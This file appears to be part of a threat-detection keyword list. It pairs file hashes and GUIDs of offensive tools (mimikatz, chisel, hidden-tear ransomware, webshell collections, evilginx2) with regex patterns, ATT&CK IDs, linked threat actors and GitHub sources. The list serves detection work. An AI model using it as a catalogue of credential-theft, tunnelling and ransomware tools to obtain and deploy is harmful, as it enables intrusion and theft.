"*7a1090e46befa253c4f1cf0d595e3718fce05aad37b08107aa02f0d40de3347f*",".{0,1000}7a1090e46befa253c4f1cf0d595e3718fce05aad37b08107aa02f0d40de3347f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29440" "*7a1d50f5e8827f2b2f920811f966be5358f0a24fa52301852b32ba94146a7be6*",".{0,1000}7a1d50f5e8827f2b2f920811f966be5358f0a24fa52301852b32ba94146a7be6.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","29441" "*7a27b58586f2af0303a70ac17220e57202a85648679466cb9bbd23517bfa4d1f*",".{0,1000}7a27b58586f2af0303a70ac17220e57202a85648679466cb9bbd23517bfa4d1f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29442" "*7a2fb0b27e7c44f2a37ad254df79b3677b010d34bf6421281a2a37c1088d613f*",".{0,1000}7a2fb0b27e7c44f2a37ad254df79b3677b010d34bf6421281a2a37c1088d613f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","29444" 
"*7a32219b9b7ba4fca2fd03d0f2387245b9f3049521b9076a5ab4a21f57bb977f*",".{0,1000}7a32219b9b7ba4fca2fd03d0f2387245b9f3049521b9076a5ab4a21f57bb977f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29445" "*7a322867ddea562c2a6a1cb9485992f3cec84f2cbf8814261f0cb604bad3958f*",".{0,1000}7a322867ddea562c2a6a1cb9485992f3cec84f2cbf8814261f0cb604bad3958f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29446" "*7a324791d74e0a99c63686f9e2cd5be616286fbd19b74f780de251e3d8ab87a7*",".{0,1000}7a324791d74e0a99c63686f9e2cd5be616286fbd19b74f780de251e3d8ab87a7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29447" 
"*7a3a00796caebdd1e5d80cc330ea232e62fecefc264492892c3ff93f15c977a2*",".{0,1000}7a3a00796caebdd1e5d80cc330ea232e62fecefc264492892c3ff93f15c977a2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29448" "*7a3a00796caebdd1e5d80cc330ea232e62fecefc264492892c3ff93f15c977a2*",".{0,1000}7a3a00796caebdd1e5d80cc330ea232e62fecefc264492892c3ff93f15c977a2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29449" "*7a3a2f28dde73ea7c3b19c7e4552185b9ff0417b2bcc8c5daaf4d14952559fbc*",".{0,1000}7a3a2f28dde73ea7c3b19c7e4552185b9ff0417b2bcc8c5daaf4d14952559fbc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29450" "*7a40166148f77773238e3e5ad7572068d0b935303278f007c6c75dd3e9e302b3*",".{0,1000}7a40166148f77773238e3e5ad7572068d0b935303278f007c6c75dd3e9e302b3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29452" "*7a4f5e4e4a422a58994593c27fc6e9772072ad573ff22483f1b6913f9bbe70ad*",".{0,1000}7a4f5e4e4a422a58994593c27fc6e9772072ad573ff22483f1b6913f9bbe70ad.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29454" "*7a4f600a398bfaf6e212a43d8a41a279a97b84b15308b7db0ffd2f54b9c117f7*",".{0,1000}7a4f600a398bfaf6e212a43d8a41a279a97b84b15308b7db0ffd2f54b9c117f7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29455" "*7a51b5ea288d01fbe7563ef86cf5ece3f04a37b6d1754192f69f19dbad570678*",".{0,1000}7a51b5ea288d01fbe7563ef86cf5ece3f04a37b6d1754192f69f19dbad570678.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29456" 
"*7a51ed902fc804066c4617af21d0325cceebce588ca66709c697916ce5214e64*",".{0,1000}7a51ed902fc804066c4617af21d0325cceebce588ca66709c697916ce5214e64.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","29457" "*7a5234a69f2e2f43bf8f67c2b738e50db29a18014be4e131234a19c98e0302b4*",".{0,1000}7a5234a69f2e2f43bf8f67c2b738e50db29a18014be4e131234a19c98e0302b4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29458" "*7A58EE54-7F2E-4C2F-B41E-19DD0D1629F1*",".{0,1000}7A58EE54\-7F2E\-4C2F\-B41E\-19DD0D1629F1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29461" 
"*7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549*",".{0,1000}7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29463" "*7a69936f724eb8af4e5a8052de3420c2359158ced63b66ae41fd6fe08c9542a8*",".{0,1000}7a69936f724eb8af4e5a8052de3420c2359158ced63b66ae41fd6fe08c9542a8.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29464" "*7a6b32cadac1e4193540c181b169ce4e73dc69a5bb185b9e98842a4e4205cc81*",".{0,1000}7a6b32cadac1e4193540c181b169ce4e73dc69a5bb185b9e98842a4e4205cc81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29465" "*7a6baa66cbbfa32e37a003017e6a24ae5ba2764f39039a56d7556f2931824e49*",".{0,1000}7a6baa66cbbfa32e37a003017e6a24ae5ba2764f39039a56d7556f2931824e49.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29466" "*7A6CEC00-4A6C-45E0-A25D-3CAB2F436EA6*",".{0,1000}7A6CEC00\-4A6C\-45E0\-A25D\-3CAB2F436EA6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29467" "*7a71b37668cc866ca43cee0d1d0b51e35fca551c12648ebd2d1e44b021566d48*",".{0,1000}7a71b37668cc866ca43cee0d1d0b51e35fca551c12648ebd2d1e44b021566d48.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29469" "*7a7f5dfc465ba190f6eb0cf36ada4e0dd90d6897c27cf4f6584472a95e828ecb*",".{0,1000}7a7f5dfc465ba190f6eb0cf36ada4e0dd90d6897c27cf4f6584472a95e828ecb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29477" "*7A87DEAE-7B94-4986-9294-BD69B12A9732*",".{0,1000}7A87DEAE\-7B94\-4986\-9294\-BD69B12A9732.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential 
Access","https://github.com/ihamburglar/fgdump","1","0","#GUIDproject","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","29478" "*7a8911925aadc8e4140a62e5467e01072148a5bb6c408fb083de934d3eb9bde0*",".{0,1000}7a8911925aadc8e4140a62e5467e01072148a5bb6c408fb083de934d3eb9bde0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29479" "*7a8950ee0a99e8abc75e9b6dcf938acba9864b827b689a7617b584d24af90627*",".{0,1000}7a8950ee0a99e8abc75e9b6dcf938acba9864b827b689a7617b584d24af90627.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29480" "*7a8cabbb37d569b2d9af56a4a11bb83dc5bb839c3d4a3ea05252e20e2d0c3a45*",".{0,1000}7a8cabbb37d569b2d9af56a4a11bb83dc5bb839c3d4a3ea05252e20e2d0c3a45.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","#filehash","N/A","N/A","8","792","102","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z","29481" "*7a8cf5bea004a74703bea87fabc76475cd2931856b9ad55dbaf7a3682f91c725*",".{0,1000}7a8cf5bea004a74703bea87fabc76475cd2931856b9ad55dbaf7a3682f91c725.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","29482" "*7a9171a7fe5be4b0676faad4c3f65124e0e2a73b79ec5b219da2204a64a3f3c7*",".{0,1000}7a9171a7fe5be4b0676faad4c3f65124e0e2a73b79ec5b219da2204a64a3f3c7.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","29483" "*7a96ab7f25001fee0cfc74b67cc4d97016b073e0d924dc26a0bd90028825fbbd*",".{0,1000}7a96ab7f25001fee0cfc74b67cc4d97016b073e0d924dc26a0bd90028825fbbd.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","29484" "*7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760*",".{0,1000}7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","29485" "*7aa2f4a66d72adefd632e15dee392cbeab0a843a4890598a9610660897b398f1*",".{0,1000}7aa2f4a66d72adefd632e15dee392cbeab0a843a4890598a9610660897b398f1.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","29488" "*7aa369f9365c35abe1cfea6a209a8a6071d7af3377a357f94721860c02e4d332*",".{0,1000}7aa369f9365c35abe1cfea6a209a8a6071d7af3377a357f94721860c02e4d332.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","#filehash","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","29489" "*7aa3fb1f8adf702283d9de96a76ec3be0f4e6e1f0eb802f003a73f30f367122f*",".{0,1000}7aa3fb1f8adf702283d9de96a76ec3be0f4e6e1f0eb802f003a73f30f367122f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29490" "*7aa6a3be25f05eb6a5c5cda7f10e48007dae601c9918a9734db3697ed6c63afc*",".{0,1000}7aa6a3be25f05eb6a5c5cda7f10e48007dae601c9918a9734db3697ed6c63afc.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script 
Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","29491" "*7aa8e56e132d653609ccc17d76b630500443bc7b4b9a3eeba8359151d3db5961*",".{0,1000}7aa8e56e132d653609ccc17d76b630500443bc7b4b9a3eeba8359151d3db5961.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#filehash","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","29492" "*7aa90fa85c912e188d6c8d0668574285af14157c5d7b73e48d339d8a3f5dcf67*",".{0,1000}7aa90fa85c912e188d6c8d0668574285af14157c5d7b73e48d339d8a3f5dcf67.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29493" "*7aac663ac8577e72ee771d1f4aee62c79a8454f3dc6b3838ca567bac23560e2a*",".{0,1000}7aac663ac8577e72ee771d1f4aee62c79a8454f3dc6b3838ca567bac23560e2a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29494" "*7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718*",".{0,1000}7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29495" "*7ac42abfb232c1b9f235969fcebf54bad0078e724552cdd89b5f32805b77a4ef*",".{0,1000}7ac42abfb232c1b9f235969fcebf54bad0078e724552cdd89b5f32805b77a4ef.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29496" "*7acb019f05541c2f8549a9d7250b5bb2c6cad5a795b73e874fbc0865fdb4719b*",".{0,1000}7acb019f05541c2f8549a9d7250b5bb2c6cad5a795b73e874fbc0865fdb4719b.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#filehash","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","29497" "*7acbf2c647d3fd9b61f6c3c8cdc8bcd3afd9f4dd1c2a95a3b30dde583b95ed22*",".{0,1000}7acbf2c647d3fd9b61f6c3c8cdc8bcd3afd9f4dd1c2a95a3b30dde583b95ed22.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29498" "*7accd179e8a6b2fc907e7e8d087c52a7f48084852724b03d25bebcada1acbca5*",".{0,1000}7accd179e8a6b2fc907e7e8d087c52a7f48084852724b03d25bebcada1acbca5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - 